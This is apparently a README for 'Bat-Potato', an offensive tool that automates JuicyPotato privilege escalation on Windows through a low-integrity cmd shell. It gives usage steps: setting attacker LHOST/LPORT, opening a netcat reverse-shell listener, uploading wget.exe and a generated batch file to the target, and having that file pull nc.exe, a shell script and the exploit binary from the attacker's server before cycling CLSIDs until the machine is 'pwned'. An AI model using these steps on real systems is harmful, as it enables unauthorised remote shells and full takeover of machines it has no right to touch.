The binaries from this repository are the last releases of each one. Keep in mind you can change them anytime.
Open Bat-Potato.py and change de default values
JUICY_REMOTE_PATH-> Working directoryCLSID_file-> List of CLSID (under /wordlist folder)LHOST-> Your IPLPORT-> Your Attacker portLWEBSERVER_PORT-> Web server port that will host manatory files .bat file will upload on serverJUICY_POTATO_BIN-> .exe of the juicypotato binary
python Bat-Potato.pyServer will be listening incomming requests. Keep that connection alive, open new tab and open another listening port for the reverse shell.
For example:
rlwrap nc -nvlp <port>You must upload the following files on the server:
- wget.exe
- Bat-Potato.bat file generated by python script
On the server, execute
.\Bat-Potato.batThis will upload shell.bat, nc.exe and Juicy binary from server and will attempt to Privesc making all the CLSID request automatically.
And wait until pwn!
As there are other alternatives to perform Juicy Privesc (https://github.com/TsukiCTF/Lovely-Potato), Bat-Potato mainly function is to accomplish the privesc with just a cmd reverse shell. No powershell is required for this actions, so with a low integrity cmd shell you can run this .bat file.
NOTE: As you can see on the .bat generated, hundreds of requests are made and will keep working until finish the list of CLSID.
Bat-Potato_demo.mp4
If video is not displayed, you can also click on this link: https://youtu.be/QL1NiryxGis
prhp for the fantastic logo: https://www.reddit.com/r/krita/comments/prhpl0/bat_potato/